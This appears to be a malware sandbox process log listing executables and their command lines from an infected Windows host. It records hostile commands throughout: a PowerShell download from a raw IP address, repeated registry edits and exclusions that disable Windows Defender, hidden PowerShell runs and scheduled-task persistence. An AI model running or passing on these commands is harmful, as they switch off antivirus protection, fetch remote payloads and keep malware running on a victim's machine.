C:\Users\Admin\AppData\Local\Temp\span6Mj_MHxFLqjA\mcm2RpnueTjoMuM5dsWN.exe

"C:\Users\Admin\AppData\Local\Temp\span6Mj_MHxFLqjA\mcm2RpnueTjoMuM5dsWN.exe"

C:\Users\Admin\Desktop\a\Newoff.exe

C:\Users\Admin\Desktop\a\Newoff.exe

C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe

"C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe

"C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe

"C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"

C:\Users\Admin\AppData\Local\Temp\span6Mj_MHxFLqjA\3QKoe7WvKXp5qtVSzI8V.exe

"C:\Users\Admin\AppData\Local\Temp\span6Mj_MHxFLqjA\3QKoe7WvKXp5qtVSzI8V.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 HR" /sc HOURLY /rl HIGHEST

C:\Users\Admin\AppData\Local\Temp\1000288001\download.exe

"C:\Users\Admin\AppData\Local\Temp\1000288001\download.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Users\Admin\AppData\Local\Temp\e624c26\download.exe

run=1 shortcut="C:\Users\Admin\AppData\Local\Temp\1000288001\download.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 HR" /sc HOURLY /rl HIGHEST

C:\Users\Admin\Desktop\a\A.I_1003H.exe

"C:\Users\Admin\Desktop\a\A.I_1003H.exe"

C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe

"C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DzmQEVPXhX.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DzmQEVPXhX" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7B74.tmp"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Users\Admin\AppData\Local\Temp\onefile_10332_133617371653341919\stub.exe

"C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn btZaCbGShXZoJDfvCg

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 LG" /sc ONLOGON /rl HIGHEST

C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe

"C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn btZaCbGShXZoJDfvCg

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 LG" /sc ONLOGON /rl HIGHEST

C:\Users\Admin\AppData\Local\Temp\1000047001\file300un.exe

"C:\Users\Admin\AppData\Local\Temp\1000047001\file300un.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Users\Admin\AppData\Local\Temp\7zS4A60.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS4A60.tmp\Install.exe PP /vSwdidWinr 385118 /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\RarSFX0\A.I.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\A.I.exe"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 17:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSB625.tmp\Install.exe\" PP /BjGdidonVh 385118 /S" /V1 /F

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\Desktop\a\Newoff.exe

C:\Users\Admin\Desktop\a\Newoff.exe

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe'

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn btZaCbGShXZoJDfvCg

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000047001\file300un.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 HR" /sc HOURLY /rl HIGHEST

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn btZaCbGShXZoJDfvCg

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Users\Admin\Desktop\a\s2.exe

"C:\Users\Admin\Desktop\a\s2.exe"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Users\Admin\AppData\Local\Temp\7zSB625.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSB625.tmp\Install.exe PP /BjGdidonVh 385118 /S

C:\Users\Admin\Desktop\a\Newoff.exe

C:\Users\Admin\Desktop\a\Newoff.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\spantmrNwLLubwBl\rVALL3PbDmQZ7Sy2ublu.exe

"C:\Users\Admin\AppData\Local\Temp\spantmrNwLLubwBl\rVALL3PbDmQZ7Sy2ublu.exe"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7756 -s 256

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\Desktop\a\Newoff.exe

C:\Users\Admin\Desktop\a\Newoff.exe

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Users\Admin\Desktop\a\WinDisc.exe

"C:\Users\Admin\Desktop\a\WinDisc.exe"

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Users\Admin\Pictures\xkHNwz7yP3aCI20HI1uu10Hi.exe

"C:\Users\Admin\Pictures\xkHNwz7yP3aCI20HI1uu10Hi.exe" /s

C:\Users\Admin\Desktop\a\setup%E8%87%AA%E6%9F%A5%E5%85%A5%E5%8F%A3.exe

"C:\Users\Admin\Desktop\a\setup%E8%87%AA%E6%9F%A5%E5%85%A5%E5%8F%A3.exe"

C:\Users\Admin\Pictures\z2B3ZrwXjN4GjO4VRYuMwVH5.exe

"C:\Users\Admin\Pictures\z2B3ZrwXjN4GjO4VRYuMwVH5.exe"

C:\Users\Admin\AppData\Local\Temp\is-RE8HF.tmp\setup%E8%87%AA%E6%9F%A5%E5%85%A5%E5%8F%A3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-RE8HF.tmp\setup%E8%87%AA%E6%9F%A5%E5%85%A5%E5%8F%A3.tmp" /SL5="$5034C,2955638,832512,C:\Users\Admin\Desktop\a\setup%E8%87%AA%E6%9F%A5%E5%85%A5%E5%8F%A3.exe"

C:\Users\Admin\Pictures\QAeu9bu2c9vstf3XBJV9GeSl.exe

"C:\Users\Admin\Pictures\QAeu9bu2c9vstf3XBJV9GeSl.exe"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Users\Admin\Desktop\a\Newoff.exe

C:\Users\Admin\Desktop\a\Newoff.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Users\Admin\Pictures\LTKg11r5qQyqKAzhC139NXy6.exe

"C:\Users\Admin\Pictures\LTKg11r5qQyqKAzhC139NXy6.exe"

C:\Users\Admin\Desktop\a\APSVR.exe

"C:\Users\Admin\Desktop\a\APSVR.exe"

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Users\Admin\Desktop\a\payload.exe

"C:\Users\Admin\Desktop\a\payload.exe"

C:\Users\Admin\Desktop\a\svhost.exe

"C:\Users\Admin\Desktop\a\svhost.exe"

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\7zSDC42.tmp\Install.exe

.\Install.exe

C:\Users\Admin\Pictures\RK21mOCHcz4A68nYpJWjGO3X.exe

"C:\Users\Admin\Pictures\RK21mOCHcz4A68nYpJWjGO3X.exe"

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Users\Admin\Pictures\5oSMLRenfDinKbeFHPu7AZ94.exe

"C:\Users\Admin\Pictures\5oSMLRenfDinKbeFHPu7AZ94.exe" /s

C:\Users\Admin\Pictures\kjeVeVn5TMDfkgRoCsTrnAzR.exe

"C:\Users\Admin\Pictures\kjeVeVn5TMDfkgRoCsTrnAzR.exe"

C:\Users\Admin\Pictures\1RP9iZ7o4C0rWfulWVBAm9ux.exe

"C:\Users\Admin\Pictures\1RP9iZ7o4C0rWfulWVBAm9ux.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Users\Admin\Desktop\a\crypted_c360a5b7.exe

"C:\Users\Admin\Desktop\a\crypted_c360a5b7.exe"

C:\Users\Admin\AppData\Local\Temp\7zSF866.tmp\Install.exe

.\Install.exe /yrVdidRYRgn "385118" /S

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Users\Admin\Desktop\a\WinDisc.exe

"C:\Users\Admin\Desktop\a\WinDisc.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Users\Admin\Pictures\eMUaEpAR9DWJu0iKJ1OIfoZ5.exe

"C:\Users\Admin\Pictures\eMUaEpAR9DWJu0iKJ1OIfoZ5.exe"

C:\Users\Admin\Desktop\a\ZinTask.exe

"C:\Users\Admin\Desktop\a\ZinTask.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\7zS3A1.tmp\Install.exe

.\Install.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Users\Admin\Desktop\a\64.exe

"C:\Users\Admin\Desktop\a\64.exe"

C:\Users\Admin\AppData\Local\Temp\7zS20ED.tmp\Install.exe

.\Install.exe /yrVdidRYRgn "385118" /S

C:\Windows\SysWOW64\cmd.exe

